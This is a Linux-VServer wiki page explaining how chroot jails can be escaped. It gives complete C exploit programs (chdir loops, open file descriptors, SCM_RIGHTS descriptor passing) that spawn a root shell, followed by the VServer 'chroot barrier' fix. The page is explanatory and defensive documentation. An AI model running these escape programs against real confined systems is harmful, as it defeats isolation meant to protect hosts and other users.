Secure chroot Barrier
From Linux-VServer
The chroot system call changes the root directory of the current process. This directory will be used for pathnames beginning with /. The root directory is inherited by all children of the current process.
However several problems are known while using the chroot system call:
- This call changes an ingredient in the pathname resolution process and does nothing else.
- This call does not change the current working directory
- This call does not close open file descriptors
These facts disclose several ways to break out of chroot, back to the original root. Some of these methods will be outlined on this page. Additionally we will discuss how a Linux-VServer kernel prevents these breakouts.
Contents |
Breakout Methods
Using a temporary directory
Since the chroot system call does not change the current working directory, after the call '.' can be outside the tree rooted at '/'. In particular, the superuser can escape from a 'chroot jail' using the following commands:
# mkdir foo # chroot foo # cd ..
This method is well known, and even documented in the chroot man page.
Using chdir("..") many times
The fact that the chroot system call does not change the current working directory allows to use the chdir system calls many times to get the old root. The following C program demonstrates how to use this method:
#include <unistd.h> #include <stdlib.h> #include <stdio.h> #include <sys/types.h> #include <sys/stat.h> void die(char *msg) { perror(msg); exit(1); } int main(int argc, char *argv[]) { int i; if (chdir("/") != 0) die("chdir(/)"); if (mkdir("baz", 0777) != 0) die("mkdir(baz)"); if (chroot("baz") != 0) die("chroot(baz)"); for (i=0; i<50; i++) { if (chdir("..") != 0) die("chdir(..)"); } if (chroot(".") != 0) die("chroot(.)"); printf("Exploit seems to work. =)\n"); execl("/bin/sh", "sh", "-i", (char *)0); die("exec sh"); exit(0); }
Using an open file descriptor
Since the chroot system call does not close open file descriptors, you can use these file descriptors pointing outside the chroot to escape. The following C program demonstrates how to use this method:
#include <unistd.h> #include <stdlib.h> #include <stdio.h> #include <fcntl.h> #include <sys/types.h> #include <sys/stat.h> void die(char *msg) { perror(msg); exit(1); } int main(int argc, char *argv[]) { int i, fd; if (chdir("/") != 0) die("chdir(/)"); if ((fd = open("/", O_RDONLY)) == -1) die("open(/)"); if (mkdir("baz", 0777) != 0) die("mkdir(baz)"); if (chroot("baz") != 0) die("chroot(baz)"); if (fchdir(fd) == -1) die("fchdir"); if (chroot(".") != 0) die("chroot(.)"); printf("Exploit seems to work. =)\n"); execl("/bin/sh", "sh", "-i", (char *)0); die("exec sh"); exit(0); }
In fact, util-vserver uses this approach to obtain a file descriptor of a directory inside the guest file system root during startup, to secure mount operations (e.g. prevent symlink attacks pointing outside the guest root)
Transferring file descriptors with SCM_RIGHTS
Even if one tries to prevent the fchdir part in the above example by forbidding open directories at chroot time, it would still be possible to break out of the chroot jail. The 'solution' here is to transfer file desciptor using socket level control message with SCM_RIGHTS. The following program demonstrates this method:
#define _GNU_SOURCE #include <stdint.h> #include <stdlib.h> #include <stdbool.h> #include <errno.h> #include <stdio.h> #include <unistd.h> #include <sys/socket.h> #include <sys/syscall.h> #include <sys/un.h> #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> bool readRights(int fd, void *buf, size_t buf_len, int *fds, size_t fd_len) { struct msghdr msg; struct iovec iov[1]; struct cmsghdr *cmptr; size_t len; size_t msg_size = sizeof(fds[0]) * fd_len; char control[CMSG_SPACE(msg_size)]; msg.msg_name = 0; msg.msg_namelen = 0; msg.msg_control = control; msg.msg_controllen = sizeof(control); msg.msg_flags = 0; msg.msg_iov = iov; msg.msg_iovlen = 1; iov[0].iov_base = buf; iov[0].iov_len = buf_len; do { len = recvmsg(fd, &msg, 0); } while (len == (size_t) (-1) && (errno == EINTR || errno == EAGAIN)); // TODO: Logging if (len == (size_t) (-1)) { perror("recvmsg()"); return false; } if (len != buf_len) return false; if (msg.msg_controllen < sizeof(struct cmsghdr)) return false; for (cmptr = CMSG_FIRSTHDR(&msg); cmptr != NULL; cmptr = CMSG_NXTHDR(&msg, cmptr)) { if (cmptr->cmsg_len != sizeof(control) || cmptr->cmsg_level != SOL_SOCKET || cmptr->cmsg_type != SCM_RIGHTS) continue; memcpy(fds, CMSG_DATA(cmptr), msg_size); return true; } write(2, "bad data\n", 9); return false; } bool sendRights(int fd, void const *buf, size_t buf_len, int const *fds, size_t fd_len) { struct cmsghdr *cmsg; size_t msg_size = sizeof(fds[0]) * fd_len; char control[CMSG_SPACE(msg_size)]; int *fdptr; struct iovec iov[1]; size_t len; struct msghdr msg = { .msg_name = 0, .msg_namelen = 0, .msg_iov = iov, .msg_iovlen = 1, .msg_control = control, .msg_controllen = sizeof control, .msg_flags = 0, }; iov[0].iov_base = (void *) (buf); iov[0].iov_len = buf_len; // from cmsg(3) cmsg = CMSG_FIRSTHDR(&msg); cmsg->cmsg_level = SOL_SOCKET; cmsg->cmsg_type = SCM_RIGHTS; cmsg->cmsg_len = CMSG_LEN(msg_size); msg.msg_controllen = cmsg->cmsg_len; fdptr = (void *) (CMSG_DATA(cmsg)); memcpy(fdptr, fds, msg_size); len = sendmsg(fd, &msg, 0); if (len == (size_t) (-1)) { perror("sendmsg()"); return false; } return (len == buf_len); } static void spawnShell() { execl("/bin/bash", "/bin/bash", "--login", (char const *) (0)); perror("execl()"); exit(1); } #define perror(X) (perror(X),0) int main(int argc, char *argv[]) { struct sockaddr_un addr = { .sun_family = AF_UNIX, .sun_path = "s" }; int fd; pid_t pid; int s; if (argc != 3) { chroot(argv[1]); spawnShell(); } pid = fork(); if (pid == 0) { fd = open(".", O_RDONLY); chdir(argv[1]); } else if (pid != 0) { chroot(argv[1]) != -1 || perror("chroot()"); chdir("/"); } s = socket(AF_UNIX, SOCK_STREAM, 0); if (pid != 0) { char c; int i; size_t len = sizeof addr; unlink(addr.sun_path); bind(s, (struct sockaddr *) &addr, sizeof addr) != -1 || perror("bind()"); listen(s, 5) != -1 || perror("listen()"); s = accept(s, (struct sockaddr *) &addr, &len); readRights(s, &c, sizeof c, &fd, 1); fchdir(fd) != -1 || perror("fchdir()"); close(fd); for (i = 0; i < 10; ++i) { chdir("..") != -1 || perror("chdir()"); } chroot(".") != -1 || perror("chroot()"); spawnShell(); } else { sleep(2); connect(s, (struct sockaddr *) &addr, sizeof addr) != -1 || perror("connect()"); sendRights(s, ".", 1, &fd, 1); close(s); } }
To use this exploit run the following commands (assuming you have compiled the above source as chrootescape):
# cp /path/to/chrootescape /new/root/ # chroot /new/root # mkdir tmp/x # ./chrootescape tmp/x X
Solution: Secure Barrier
While early Linux-VServer versions tried to fix this by "funny" methods, recent versions use a special marking, known as the chroot barrier, on the parent directory of each VPS to prevent unauthorized modification and escape from confinement. This barrier is implemented as a Filesystem Attribute and prevents a path_walk into a directory with enabled barrier.
Therefore it is important to set the barrier flag on your vserver base directory, for example:
# setattr --barrier /vservers # showattr /vservers ---Bui- /vservers ---bui- /vservers/pasat
If you keep all the guests in one mountpoint, setting the barrier on /vservers is enough, otherwise it should be repeated for each mount point.
If you want to be safe you may choose to just set the barrier for each individual guest, for example:
cd -P /etc/vservers/<guest>/vdir; setattr --barrier ..
Please note that it's important to set the barrier against ".." inside /path/to/guest/
(note: ---Bui- barrier set, ---bui- barrier available and not set)